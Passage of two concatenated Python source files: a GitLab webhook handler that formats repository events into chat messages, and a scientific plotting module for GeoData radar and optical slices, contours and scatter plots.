for commit in payload.get('commits')
]
return get_push_commits_event_message(
get_user_name(payload),
compare_url,
get_branch_name(payload),
commits
)
def get_remove_branch_event_body(payload):
# type: (Dict[str, Any]) -> Text
return get_remove_branch_event_message(
get_user_name(payload),
get_branch_name(payload)
)
def get_tag_push_event_body(payload):
# type: (Dict[str, Any]) -> Text
return get_push_tag_event_message(
get_user_name(payload),
get_tag_name(payload),
action="pushed" if payload.get('checkout_sha') else "removed"
)
def get_issue_created_event_body(payload):
# type: (Dict[str, Any]) -> Text
return get_issue_event_message(
get_issue_user_name(payload),
'created',
get_object_url(payload),
payload.get('object_attributes').get('iid'),
payload.get('object_attributes').get('description'),
get_objects_assignee(payload)
)
def get_issue_event_body(payload, action):
# type: (Dict[str, Any], Text) -> Text
return get_issue_event_message(
get_issue_user_name(payload),
action,
get_object_url(payload),
payload.get('object_attributes').get('iid'),
)
def get_merge_request_updated_event_body(payload):
# type: (Dict[str, Any]) -> Text
if payload.get('object_attributes').get('oldrev'):
return get_merge_request_event_body(payload, "added commit(s) to")
return get_merge_request_open_or_updated_body(payload, "updated")
def get_merge_request_event_body(payload, action):
# type: (Dict[str, Any], Text) -> Text
pull_request = payload.get('object_attributes')
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
pull_request.get('url'),
pull_request.get('iid'),
type='MR',
)
def get_merge_request_open_or_updated_body(payload, action):
# type: (Dict[str, Any], Text) -> Text
pull_request = payload.get('object_attributes')
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
pull_request.get('url'),
pull_request.get('iid'),
pull_request.get('source_branch'),
pull_request.get('target_branch'),
pull_request.get('description'),
get_objects_assignee(payload),
type='MR',
)
def get_objects_assignee(payload):
# type: (Dict[str, Any]) -> Text
assignee_object = payload.get('assignee')
if assignee_object:
return assignee_object.get('name')
def get_commented_commit_event_body(payload):
# type: (Dict[str, Any]) -> Text
comment = payload.get('object_attributes')
action = u'[commented]({})'.format(comment['url'])
return get_commits_comment_action_message(
get_issue_user_name(payload),
action,
payload.get('commit').get('url'),
payload.get('commit').get('id'),
comment['note'],
)
def get_commented_merge_request_event_body(payload):
# type: (Dict[str, Any]) -> Text
comment = payload.get('object_attributes')
action = u'[commented]({}) on'.format(comment['url'])
url = u'{}/merge_requests/{}'.format(
payload.get('project').get('web_url'),
payload.get('merge_request').get('iid')
)
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
url,
payload.get('merge_request').get('iid'),
message=comment['note'],
type='MR'
)
def get_commented_issue_event_body(payload):
# type: (Dict[str, Any]) -> Text
comment = payload.get('object_attributes')
action = u'[commented]({}) on'.format(comment['url'])
url = u'{}/issues/{}'.format(
payload.get('project').get('web_url'),
payload.get('issue').get('iid')
)
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
url,
payload.get('issue').get('iid'),
message=comment['note'],
type='Issue'
)
def get_commented_snippet_event_body(payload):
# type: (Dict[str, Any]) -> Text
comment = payload.get('object_attributes')
action = u'[commented]({}) on'.format(comment['url'])
url = u'{}/snippets/{}'.format(
payload.get('project').get('web_url'),
payload.get('snippet').get('id')
)
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
url,
payload.get('snippet').get('id'),
message=comment['note'],
type='Snippet'
)
def get_wiki_page_event_body(payload, action):
# type: (Dict[str, Any], Text) -> Text
return u"{} {} [Wiki Page \"{}\"]({}).".format(
get_issue_user_name(payload),
action,
payload.get('object_attributes').get('title'),
payload.get('object_attributes').get('url'),
)
def get_build_hook_event_body(payload):
# type: (Dict[str, Any]) -> Text
build_status = payload.get('build_status')
if build_status == 'created':
action = 'was created'
elif build_status == 'running':
action = 'started'
else:
action = 'changed status to {}'.format(build_status)
return u"Build {} from {} stage {}.".format(
payload.get('build_name'),
payload.get('build_stage'),
action
)
def get_pipeline_event_body(payload):
# type: (Dict[str, Any]) -> Text
pipeline_status = payload.get('object_attributes').get('status')
if pipeline_status == 'pending':
action = 'was created'
elif pipeline_status == 'running':
action = 'started'
else:
action = 'changed status to {}'.format(pipeline_status)
builds_status = u""
for build in payload.get('builds'):
builds_status += u"* {} - {}\n".format(build.get('name'), build.get('status'))
return u"Pipeline {} with build(s):\n{}.".format(action, builds_status[:-1])
def get_repo_name(payload):
# type: (Dict[str, Any]) -> Text
return payload['project']['name']
def get_user_name(payload):
# type: (Dict[str, Any]) -> Text
return payload['user_name']
def get_issue_user_name(payload):
# type: (Dict[str, Any]) -> Text
return payload['user']['name']
def get_repository_homepage(payload):
# type: (Dict[str, Any]) -> Text
return payload['repository']['homepage']
def get_branch_name(payload):
# type: (Dict[str, Any]) -> Text
return payload['ref'].replace('refs/heads/', '')
def get_tag_name(payload):
# type: (Dict[str, Any]) -> Text
return payload['ref'].replace('refs/tags/', '')
def get_object_iid(payload):
# type: (Dict[str, Any]) -> Text
return payload['object_attributes']['iid']
def get_object_url(payload):
# type: (Dict[str, Any]) -> Text
return payload['object_attributes']['url']
EVENT_FUNCTION_MAPPER = {
'Push Hook': get_push_event_body,
'Tag Push Hook': get_tag_push_event_body,
'Issue Hook open': get_issue_created_event_body,
'Issue Hook close': partial(get_issue_event_body, action='closed'),
'Issue Hook reopen': partial(get_issue_event_body, action='reopened'),
'Issue Hook update': partial(get_issue_event_body, action='updated'),
'Note Hook Commit': get_commented_commit_event_body,
'Note Hook MergeRequest': get_commented_merge_request_event_body,
'Note Hook Issue': get_commented_issue_event_body,
'Note Hook Snippet': get_commented_snippet_event_body,
'Merge Request Hook open': partial(get_merge_request_open_or_updated_body, action='created'),
'Merge Request Hook update': get_merge_request_updated_event_body,
'Merge Request Hook merge': partial(get_merge_request_event_body, action='merged'),
'Merge Request Hook close': partial(get_merge_request_event_body, action='closed'),
'Wiki Page Hook create': partial(get_wiki_page_event_body, action='created'),
'Wiki Page Hook update': partial(get_wiki_page_event_body, action='updated'),
'Build Hook': get_build_hook_event_body,
'Pipeline Hook': get_pipeline_event_body,
}
@api_key_only_webhook_view("Gitlab")
@has_request_variables
def api_gitlab_webhook(request, user_profile, client,
stream=REQ(default='gitlab'),
payload=REQ(argument_type='body')):
# type: (HttpRequest, UserProfile, Client, Text, Dict[str, Any]) -> HttpResponse
event = get_event(request, payload)
body = get_body_based_on_event(event)(payload)
subject = get_subject_based_on_event(event, payload)
check_send_message(user_profile, client, 'stream', [stream], subject, body)
return json_success()
def get_body_based_on_event(event):
# type: (str) -> Any
return EVENT_FUNCTION_MAPPER[event]
def get_subject_based_on_event(event, payload):
# type: (str, Dict[str, Any]) -> Text
if event == 'Push Hook':
return u"{} / {}".format(get_repo_name(payload), get_branch_name(payload))
elif event == 'Build Hook':
return u"{} / {}".format(payload.get('repository').get('name'), get_branch_name(payload))
elif event == 'Pipeline Hook':
return u"{} / {}".format(
get_repo_name(payload),
payload.get('object_attributes').get('ref').replace('refs/heads/', ''))
elif event.startswith('Merge Request Hook'):
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='MR',
id=payload.get('object_attributes').get('iid'),
title=payload.get('object_attributes').get('title')
)
elif event.startswith('Issue Hook'):
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='Issue',
id=payload.get('object_attributes').get('iid'),
title=payload.get('object_attributes').get('title')
)
elif event == 'Note Hook Issue':
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='Issue',
id=payload.get('issue').get('iid'),
title=payload.get('issue').get('title')
)
elif event == 'Note Hook MergeRequest':
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='MR',
id=payload.get('merge_request').get('iid'),
title=payload.get('merge_request').get('title')
)
elif event == 'Note Hook Snippet':
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='Snippet',
id=payload.get('snippet').get('id'),
title=payload.get('snippet').get('title')
)
return get_repo_name(payload)
def get_event(request, payload):
# type: (HttpRequest, Dict[str, Any]) -> str
event = request.META['HTTP_X_GITLAB_EVENT']
if event == 'Issue Hook':
action = payload.get('object_attributes').get('action')
event = "{} {}".format(event, action)
elif event == 'Note Hook':
action = payload.get('object_attributes').get('noteable_type')
event = "{} {}".format(event, action)
elif event == 'Merge Request Hook':
action = payload.get('object_attributes').get('action')
event = "{} {}".format(event, action)
elif event == 'Wiki Page Hook':
action = payload.get('object_attributes').get('action')
event = "{} {}".format(event, action)
if event in list(EVENT_FUNCTION_MAPPER.keys()):
return event
raise UnknownEventType(u'Event {} is unknown and cannot be handled'.format(event))
|
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 02 09:38:14 2015
@author: Anna Stuhlmacher
plotting
"""
from __future__ import division, absolute_import
import logging
import numpy as np
import scipy as sp
import scipy.interpolate as spinterp
import time
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
from matplotlib.ticker import ScalarFormatter
import matplotlib.cm as cm
from mpl_toolkits import mplot3d
import pkg_resources as pkgr
#from mpl_toolkits.mplot3d import Axes3D
#from matplotlib import cm
#from matplotlib import ticker
#
from .CoordTransforms import angles2xy#,sphereical2Cartisian
from .GeoData import GeoData
# NOTE: using usetex can make complicated plots unstable and crash
#try:
# plt.rc('text', usetex=True)
# plt.rc('font', family='serif')
#except Exception as e:
# logging.info('Latex install not complete, falling back to basic fonts. apt-get install dvipng')
#
sfmt = ScalarFormatter(useMathText=True)
#%%
def vergeq(packagename,verstring):
"""
This function will check if the version of a given package is higher than a given version number in string form.
Inputs
packagename - The name of the package to be tested.
verstring - The desired version in string form with numbers seperated by periods.
Output
boolcheck - A bool that determines the
"""
return pkgr.parse_version(pkgr.get_distribution(packagename).version) > pkgr.parse_version(verstring)
try:
plt.get_cmap('plasma')
defmap = 'viridis'
defmap3d = 'viridis'
except ValueError:
defmap = 'jet'
defmap3d = 'jet'
def _dointerp(geodatalist,altlist,xyvecs,picktimeind):
opt = None; isr = None #in case of failure
xvec = xyvecs[0]
yvec = xyvecs[1]
x, y = np.meshgrid(xvec, yvec)
z = np.ones(x.shape)*altlist
new_coords = np.column_stack((x.ravel(), y.ravel(), z.ravel()))
extent=[xvec.min(), xvec.max(), yvec.min(), yvec.max()]
key={}
#%% iterative demo, not used yet
# inst = []
# for g in geodatalist:
# if g is None:
# continue
# for k in g.data.keys():
# try:
# G = g.timeslice(picktimeind)
# G.interpolate(new_coords, newcoordname='Cartesian', method='nearest', fill_value=np.nan)
# interpData = G.data[k]
# inst.append(interpData[:,0].reshape(x.shape))
# except Exception as e:
# logging.warning('skipping instrument {}'.format(e))
#%% optical
g = geodatalist[0]
if g is not None:
try:
key['opt'] = list(g.data.keys()) #list necessary for Python3
G = g.timeslice(picktimeind)
G.interpolate(new_coords, newcoordname='Cartesian', method='nearest', fill_value=np.nan)
interpData = G.data[key['opt'][0]]
opt = interpData[:, 0].reshape(x.shape)
except IndexError as e:
logging.warning('did you pick a time index outside camera observation? {}'.format(e))
except Exception as e:
logging.error('problem in optical interpolation {}'.format(e))
#%% isr
g = geodatalist[1]
if g is not None:
try:
key['isr'] = list(g.data.keys()) #list necessary for Python3
G = g.timeslice(picktimeind)
G.interpolate(new_coords, newcoordname='Cartesian', method='nearest',
fill_value=np.nan)
interpData = G.data[key['isr'][0]]
isr = interpData[:, 0].reshape(x.shape)
except Exception as e:
logging.error('problem in ISR interpolation {}'.format(e))
return opt,isr,extent,key,x,y
#%%
def alt_slice_overlay(geodatalist, altlist, xyvecs, vbounds, title, axis=None,picktimeind=[0]):
"""
geodatalist - A list of geodata objects that will be overlayed, first object is on the bottom and in gray scale
altlist - A list of the altitudes that we can overlay.
xyvecs- A list of x and y numpy arrays that have the x and y coordinates that the data will be interpolated over. ie, xyvecs=[np.linspace(-100.0,500.0),np.linspace(0.0,600.0)]
vbounds = a list of bounds for each geodata object. ie, vbounds=[[500,2000], [5e10,5e11]]
title - A string that holds for the overall image
picktimeind - indices in time to extract and plot (arbitrary choice)
Returns an image of an overlayed plot at a specific altitude.
"""
ax = axis #less typing
opt, isr,extent, key, x, y = _dointerp(geodatalist, altlist, xyvecs, picktimeind)
#%% plots
if ax is None:
fg = plt.figure()
ax = fg.gca()
ax.set_title(title)
ax.set_xlabel('x')
ax.set_ylabel('y')
else:
fg = ax.get_figure()
#%%
try:
bottom = ax.imshow(opt, cmap='gray', extent=extent, origin='lower', interpolation='none',
vmin=vbounds[0][0], vmax=vbounds[0][1])
c = fg.colorbar(bottom, ax=ax)
c.set_label(key['opt'][0])
except Exception as e:
logging.info('problem plotting Optical slice {}'.format(e))
#%%
if isr is None or not np.isfinite(isr).any():
logging.warning('Nothing to plot for ISR, all NaN')
try:
top = ax.imshow(isr, alpha=0.4, extent=extent, origin='lower', interpolation='none',
vmin=vbounds[1][0], vmax=vbounds[1][1])
c = fg.colorbar(top,ax=ax)
c.set_label(key['isr'][0])
except Exception as e:
logging.info('Problem plotting slice {}'.format(e))
return ax
#%%
def alt_contour_overlay(geodatalist, altlist, xyvecs, vbounds, title, axis=None, picktimeind=[1, 2]):
"""
geodatalist - A list of geodata objects that will be overlayed, first object is on the bottom and in gray scale
altlist - A list of the altitudes that we can overlay.
xyvecs- A list of x and y numpy arrays that have the x and y coordinates that the data will be interpolated over.
vbounds = a list of bounds for each geodata object. ie, vbounds=[[500,2000], [5e10,5e11]]
title - A string that holds for the overall image
picktimeind - indices in time to extract and plot (arbitrary choice)
Returns an image of an overlayed plot at a specific altitude.
"""
ax = axis #less typing
opt, isr, extent, key, x, y = _dointerp(geodatalist, altlist, xyvecs, picktimeind)
#%% plots
if axis is None:
fg = plt.figure()
ax = fg.gca()
ax.set_title(title)
ax.set_xlabel('x')
ax.set_ylabel('y')
else:
fg = ax.get_figure()
#%%
try:
bottom = ax.imshow(opt, cmap='gray', extent=extent, origin='lower', interpolation='none',
vmin=vbounds[0][0], vmax=vbounds[0][1])
cbar1 = plt.colorbar(bottom, orientation='horizontal', ax=ax)
cbar1.set_label(key['opt'][0])
except Exception as e:
logging.info('problem plotting optical {}'.format(e))
try:
top = ax.contour(x, y, isr,extent=extent, origin='lower', interpolation='none',
vmin=vbounds[1][0], vmax=vbounds[1][1])
#clabel(top,inline=1,fontsize=10, fmt='%1.0e')
cbar2 = fg.colorbar(top, format='%.0e', ax=ax)
cbar2.set_label(key['isr'][0])
except Exception as e:
logging.info('problem plotting isr contour {}'.format(e))
return ax
def plot3Dslicempl(geodata, surfs, vbounds, titlestr='', time=0, gkey=None, cmap=defmap3d, ax=None, fig=None, method='linear',
fill_value=np.nan, view=None, units='', colorbar=False):
""" This function create 3-D slice image given either a surface or list of coordinates to slice through
Inputs:
geodata - A geodata object that will be plotted in 3D
surfs - This is a three element list. Each element can either be
altlist - A list of the altitudes that RISR parameter slices will be taken at
xyvecs- A list of x and y numpy arrays that have the x and y coordinates that the data will be interpolated over. ie, xyvecs=[np.linspace(-100.0,500.0),np.linspace(0.0,600.0)]
vbounds = a list of bounds for the geodata objec's parameters. ie, vbounds=[500,2000]
title - A string that holds for the overall image
ax - A handle for an axis that this will be plotted on.
Returns a mayavi image with a surface
"""
assert geodata.coordnames.lower() == 'cartesian'
datalocs = geodata.dataloc
xvec = sp.unique(datalocs[:, 0])
yvec = sp.unique(datalocs[:, 1])
zvec = sp.unique(datalocs[:, 2])
assert len(xvec)*len(yvec)*len(zvec) == datalocs.shape[0]
#determine if the ordering is fortran or c style ordering
diffcoord = sp.diff(datalocs, axis=0)
if diffcoord[0, 1] != 0.0:
ar_ord = 'f'
elif diffcoord[0, 2] != 0.0:
ar_ord = 'c'
elif diffcoord[0, 0] != 0.0:
if len(np.where(diffcoord[:, 1])[0]) == 0:
ar_ord = 'f'
elif len(np.where(diffcoord[:, 2])[0]) == 0:
ar_ord = 'c'
matshape = (len(yvec), len(xvec), len(zvec))
# reshape the arrays into a matricies for plotting
x, y, z = [sp.reshape(datalocs[:, idim], matshape, order=ar_ord) for idim in range(3)]
if gkey is None:
gkey = geodata.datanames()[0]
porig = geodata.data[gkey][:, time]
if fig is None:
fig = plt.figure()
if ax is None:
fig.gca(projection='3d')
#determine if list of slices or surfaces are given
islists = isinstance(surfs[0], list)
if isinstance(surfs[0], np.ndarray):
onedim = surfs[0].ndim == 1
#get slices for each dimension out
surflist = []
if islists or onedim:
p = np.reshape(porig, matshape, order=ar_ord)
xslices = surfs[0]
for isur in xslices:
indx = sp.argmin(sp.absolute(isur-xvec))
xtmp = x[:, indx]
ytmp = y[:, indx]
ztmp = z[:, indx]
ptmp = p[:, indx]
cmapobj = cm.ScalarMappable(cmap=cmap)
cmapobj.set_array(ptmp)
cmapobj.set_clim(vbounds)
rgba = cmapobj.to_rgba(ptmp)
# make NaNs transparient
rgba[np.isnan(ptmp), -1] = 0
surf_h = ax.plot_surface(xtmp, ytmp, ztmp, rstride=1, cstride=1,
facecolors=rgba, linewidth=0,
antialiased=False, shade=False)
surflist.append(surf_h)
yslices = surfs[1]
for isur in yslices:
indx = sp.argmin(sp.absolute(isur-yvec))
xtmp = x[indx]
ytmp = y[indx]
ztmp = z[indx]
ptmp = p[indx]
cmapobj = cm.ScalarMappable(cmap=cmap)
cmapobj.set_array(ptmp)
cmapobj.set_clim(vbounds)
rgba = cmapobj.to_rgba(ptmp)
# make NaNs transparient
rgba[np.isnan(ptmp), -1] = 0
surf_h = ax.plot_surface(xtmp, ytmp, ztmp, rstride=1, cstride=1,
facecolors=rgba, linewidth=0,
antialiased=False, shade=False)
surflist.append(surf_h)
zslices = surfs[2]
for isur in zslices:
indx = sp.argmin(sp.absolute(isur-zvec))
xtmp = x[:, :, indx]
ytmp = y[:, :, indx]
ztmp = z[:, :, indx]
ptmp = p[:, :, indx]
cmapobj = cm.ScalarMappable(cmap=cmap)
cmapobj.set_array(ptmp)
cmapobj.set_clim(vbounds)
rgba = cmapobj.to_rgba(ptmp)
# make NaNs transparient
rgba[np.isnan(ptmp), -1] = 0
surf_h = ax.plot_surface(xtmp, ytmp, ztmp, rstride=1, cstride=1,
facecolors=rgba, linewidth=0,
antialiased=False, shade=False)
surflist.append(surf_h)
else:
# For a general surface.
xtmp, ytmp, ztmp = surfs[:]
gooddata = ~np.isnan(porig)
curparam = porig[gooddata]
curlocs = datalocs[gooddata]
new_coords = np.column_stack((xtmp.flatten(), ytmp.flatten(), ztmp.flatten()))
ptmp = spinterp.griddata(curlocs, curparam, new_coords, method, fill_value)
cmapobj = cm.ScalarMappable(cmap=cmap)
cmapobj.set_array(ptmp)
cmapobj.set_clim(vbounds)
rgba = cmapobj.to_rgba(ptmp)
# make NaNs transparient
rgba[np.isnan(ptmp), -1] = 0
surf_h = ax.plot_surface(xtmp, ytmp, ztmp, rstride=1, cstride=1,
facecolors=rgba, linewidth=0,
antialiased=False, shade=False)
surflist.append(surf_h)
ax.set_title(titlestr)
ax.set_xlabel('x in km')
ax.set_ylabel('y in km')
ax.set_zlabel('z in km')
if view is not None:
# order of elevation is changed between matplotlib and mayavi
ax.view_init(view[1],view[0])
if colorbar:
if units == '':
titlestr = gkey
else:
titlstr = gkey +' in ' +units
cbar = plt.colorbar(cmapobj, ax=ax, orientation='vertical')
return surflist, cbar
else:
return surflist
def slice2DGD(geod, axstr, slicenum, vbounds=None, time=0, gkey=None, cmap=defmap,
fig=None, ax=None, title='', cbar=True, m=None):
"""
This function create 2-D slice image given either a surface or list of coordinates to slice through
Inputs:
geodata - A geodata object that will be plotted.
axstr - A string that specifies the plane that will be ploted.
slicenum - The index location of that slice in the axis if the data were in a 3-D array.
vbounds = a list of bounds for the geodata objec's parameters. ie, vbounds=[500,2000]
time - The index of for the location in time that will be plotted.
gkey - The name of the data that will be plotted.
cmap - The color map to be used.
fig - The figure handle that will be used.
title - A string that holds for the overall image
ax - A handle for an axis that this will be plotted on.
cbar - A bool for creating the color bar, default =True.
m - A handle for a map object if plotting over one.
Outputs:
ploth - The handle for the ploted image.
cbar - The color bar handle for the image.
"""
#xyzvecs is the area that the data covers.
poscoords = ['cartesian','wgs84','enu','ecef']
assert geod.coordnames.lower() in poscoords
if geod.coordnames.lower() in ['cartesian','enu','ecef']:
axdict = {'x':0,'y':1,'z':2}
veckeys = ['x','y','z']
elif geod.coordnames.lower() == 'wgs84':
axdict = {'lat':0,'long':1,'alt':2}# shows which row is this coordinate
veckeys = ['long','lat','alt']# shows which is the x, y and z axes for plotting
if type(axstr)==str:
axis=axstr
else:
axis= veckeys[axstr]
veckeys.remove(axis.lower())
veckeys.append(axis.lower())
datacoords = geod.dataloc
xyzvecs = {l:sp.unique(datacoords[:,axdict[l]]) for l in veckeys}
#make matrices
M1,M2 = sp.meshgrid(xyzvecs[veckeys[0]],xyzvecs[veckeys[1]])
slicevec = sp.unique(datacoords[:,axdict[axis]])
min_idx = sp.argmin(sp.absolute(slicevec-slicenum))
slicenum=slicevec[min_idx]
rec_coords = {axdict[veckeys[0]]:M1.flatten(),axdict[veckeys[1]]:M2.flatten(),
axdict[axis]:slicenum*sp.ones(M2.size)}
new_coords = sp.zeros((M1.size,3))
#make coordinates
for ckey in rec_coords.keys():
new_coords[:,ckey] = rec_coords[ckey]
#determine the data name
if gkey is None:
gkey = geod.data.keys[0]
# get the data location, first check if the data can be just reshaped then do a
# search
sliceindx = slicenum==datacoords[:,axdict[axis]]
datacoordred = datacoords[sliceindx]
rstypes = ['C','F','A']
nfounds = True
M1dlfl = datacoordred[:,axdict[veckeys[0]]]
M2dlfl = datacoordred[:,axdict[veckeys[1]]]
for ir in rstypes:
M1dl = sp.reshape(M1dlfl,M1.shape,order =ir)
M2dl = sp.reshape(M2dlfl,M1.shape,order =ir)
if sp.logical_and(sp.allclose(M1dl,M1),sp.allclose(M2dl,M2)):
nfounds=False
break
if nfounds:
dataout = geod.datareducelocation(new_coords,geod.coordnames,gkey)[:,time]
dataout = sp.reshape(dataout,M1.shape)
else:
dataout = sp.reshape(geod.data[gkey][sliceindx,time],M1.shape,order=ir)
title = insertinfo(title,gkey,geod.times[time,0],geod.times[time,1])
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
if m is None:
ploth = ax.pcolor(M1,M2,dataout,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap,
linewidth=0,rasterized=True)
ploth.set_edgecolor('face')
ax.axis([xyzvecs[veckeys[0]].min(), xyzvecs[veckeys[0]].max(),
xyzvecs[veckeys[1]].min(), xyzvecs[veckeys[1]].max()])
if cbar:
cbar2 = plt.colorbar(ploth, ax=ax, format='%.0e')
else:
cbar2 = None
ax.set_title(title)
ax.set_xlabel(veckeys[0])
ax.set_ylabel(veckeys[1])
else:
N1,N2 = m(M1,M2)
ploth = m.pcolor(N1,N2,dataout,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap,
alpha=.4,linewidth=0,rasterized=True)
if cbar:
cbar2 = m.colorbar(ploth, format='%.0e')
else:
cbar2 = None
return(ploth,cbar2)
def contourGD(geod,axstr,slicenum,vbounds=None,time = 0,gkey = None,cmap=defmap,
fig=None,ax=None,title='',cbar=True,m=None,levels=None):
""" """
poscoords = ['cartesian','wgs84','enu','ecef']
assert geod.coordnames.lower() in poscoords
if geod.coordnames.lower() in ['cartesian','enu','ecef']:
axdict = {'x':0,'y':1,'z':2}
veckeys = ['x','y','z']
elif geod.coordnames.lower() == 'wgs84':
axdict = {'lat':0,'long':1,'alt':2}# shows which row is this coordinate
veckeys = ['long','lat','alt']# shows which is the x, y and z axes for plotting
if type(axstr)==str:
axis=axstr
else:
axis= veckeys[axstr]
veckeys.remove(axis.lower())
veckeys.append(axis.lower())
datacoords = geod.dataloc
xyzvecs = {l:sp.unique(datacoords[:,axdict[l]]) for l in veckeys}
#make matrices
M1,M2 = sp.meshgrid(xyzvecs[veckeys[0]],xyzvecs[veckeys[1]])
slicevec = sp.unique(datacoords[:,axdict[axis]])
min_idx = sp.argmin(sp.absolute(slicevec-slicenum))
slicenum=slicevec[min_idx]
rec_coords = {axdict[veckeys[0]]:M1.flatten(),axdict[veckeys[1]]:M2.flatten(),
axdict[axis]:slicenum*sp.ones(M2.size)}
new_coords = sp.zeros((M1.size,3))
#make coordinates
for ckey in rec_coords.keys():
new_coords[:,ckey] = rec_coords[ckey]
#determine the data name
if gkey is None:
gkey = geod.data.keys[0]
# get the data location, first check if the data can be just reshaped then do a
# search
sliceindx = slicenum==datacoords[:,axdict[axis]]
datacoordred = datacoords[sliceindx]
rstypes = ['C','F','A']
nfounds = True
M1dlfl = datacoordred[:,axdict[veckeys[0]]]
M2dlfl = datacoordred[:,axdict[veckeys[1]]]
for ir in rstypes:
M1dl = sp.reshape(M1dlfl,M1.shape,order =ir)
M2dl = sp.reshape(M2dlfl,M1.shape,order =ir)
if sp.logical_and(sp.allclose(M1dl,M1),sp.allclose(M2dl,M2)):
nfounds=False
break
if nfounds:
dataout = geod.datareducelocation(new_coords,geod.coordnames,gkey)[:,time]
dataout = sp.reshape(dataout,M1.shape)
else:
dataout = sp.reshape(geod.data[gkey][sliceindx,time],M1.shape,order=ir)
title = insertinfo(title,gkey,geod.times[time,0],geod.times[time,1])
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
if vbounds is None:
vbounds=[sp.nanmin(dataout),sp.nanmax(dataout)]
if levels is None:
levels=sp.linspace(vbounds[0],vbounds[1],5)
if m is None:
ploth = ax.contour(M1,M2,dataout,levels = levels,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap)
ax.axis([xyzvecs[veckeys[0]].min(), xyzvecs[veckeys[0]].max(),
xyzvecs[veckeys[1]].min(), xyzvecs[veckeys[1]].max()])
if cbar:
cbar2 = plt.colorbar(ploth, ax=ax, format='%.0e')
else:
cbar2 = None
ax.set_title(title)
ax.set_xlabel(veckeys[0])
ax.set_ylabel(veckeys[1])
else:
N1,N2 = m(M1,M2)
ploth = ax.contour(N1,N2,dataout,levels = levels,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap)
if cbar:
#cbar2 = m.colorbar(ploth, format='%.0e')
cbar2 = m.colorbar(ploth)
else:
cbar2 = None
return(ploth,cbar2)
def scatterGD(geod,axstr,slicenum,vbounds=None,time = 0,gkey = None,cmap=defmap,fig=None,
ax=None,title='',cbar=True,err=.1,m=None):
""" This will make a scatter plot given a GeoData object."""
poscoords = ['cartesian','wgs84','enu','ecef']
assert geod.coordnames.lower() in poscoords
if geod.coordnames.lower() in ['cartesian','enu','ecef']:
axdict = {'x':0,'y':1,'z':2}
veckeys = ['x','y','z']
elif geod.coordnames.lower() == 'wgs84':
axdict = {'lat':0,'long':1,'alt':2}# shows which row is this coordinate
veckeys = ['long','lat','alt']# shows which is the x, y and z axes for plotting
if type(axstr)==str:
axis=axstr
else:
axis= veckeys[axstr]
#determine the data name
if gkey is None:
gkey = geod.data.keys[0]
geod=geod.timeslice(time)
veckeys.remove(axis.lower())
veckeys.append(axis.lower())
datacoords = geod.dataloc
xyzvecs = {l:sp.unique(datacoords[:,axdict[l]]) for l in veckeys}
xyzvecsall = {l:datacoords[:,axdict[l]] for l in veckeys}
if geod.issatellite():
zdata = xyzvecsall[veckeys[2]]
indxnum = np.abs(zdata-slicenum)<err
xdata =xyzvecsall[veckeys[0]][indxnum]
ydata =xyzvecsall[veckeys[1]][indxnum]
dataout = geod.data[gkey][indxnum]
title = insertinfo(title,gkey,geod.times[:,0].min(),geod.times[:,1].max())
else:
#make matrices
xvec = xyzvecs[veckeys[0]]
yvec = xyzvecs[veckeys[1]]
M1,M2 = sp.meshgrid(xvec,yvec)
slicevec = sp.unique(datacoords[:,axdict[axis]])
min_idx = sp.argmin(sp.absolute(slicevec-slicenum))
slicenum=slicevec[min_idx]
rec_coords = {axdict[veckeys[0]]:M1.flatten(),axdict[veckeys[1]]:M2.flatten(),
axdict[axis]:slicenum*sp.ones(M2.size)}
new_coords = sp.zeros((M1.size,3))
xdata = M1.flatten()
ydata= M2.flatten()
#make coordinates
for ckey in rec_coords.keys():
new_coords[:,ckey] = rec_coords[ckey]
# get the data location, first check if the data can be just reshaped then do a
# search
sliceindx = slicenum==datacoords[:,axdict[axis]]
datacoordred = datacoords[sliceindx]
rstypes = ['C','F','A']
nfounds = True
M1dlfl = datacoordred[:,axdict[veckeys[0]]]
M2dlfl = datacoordred[:,axdict[veckeys[1]]]
for ir in rstypes:
M1dl = sp.reshape(M1dlfl,M1.shape,order =ir)
M2dl = sp.reshape(M2dlfl,M1.shape,order =ir)
if sp.logical_and(sp.allclose(M1dl,M1),sp.allclose(M2dl,M2)):
nfounds=False
break
if nfounds:
dataout = geod.datareducelocation(new_coords,geod.coordnames,gkey)[:,time]
dataout = sp.reshape(dataout,M1.shape)
else:
dataout = sp.reshape(geod.data[gkey][sliceindx,time],M1.shape,order=ir)
title = insertinfo(title,gkey,geod.times[time,0],geod.times[time,1])
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
if m is None:
ploth = ax.scatter(xdata,ydata,c=dataout,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap)
ax.axis([xyzvecs[veckeys[0]].min(), xyzvecs[veckeys[0]].max(),
xyzvecs[veckeys[1]].min(), xyzvecs[veckeys[1]].max()])
if cbar:
cbar2 = plt.colorbar(ploth, ax=ax, format='%.0e')
else:
cbar2 = None
ax.set_title(title)
ax.set_xlabel(veckeys[0])
ax.set_ylabel(veckeys[1])
else:
Xdata,Ydata = m(xdata,ydata)
ploth = m.scatter(Xdata,Ydata,c=dataout,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap)
if cbar:
cbar2 = m.colorbar(ploth)
else:
